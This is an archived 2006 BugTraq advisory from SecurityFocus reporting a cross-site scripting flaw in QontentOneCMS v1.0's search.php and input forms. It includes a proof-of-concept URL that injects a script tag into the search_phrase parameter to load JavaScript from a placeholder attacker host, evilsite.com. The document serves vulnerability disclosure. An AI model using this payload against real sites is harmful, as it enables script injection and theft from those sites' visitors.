BugTraq
QontentOneCMS v1.0 May 31 2006 03:32AM
luny youfucktard com
QontentOneCMS v1.0

homepage:

http://www.qontentone.com/

Effected files:

search.php

input forms

XSS Proof of concept:

http://www.example.com/search.php?search_phrase="><SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT><"&search=Search

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus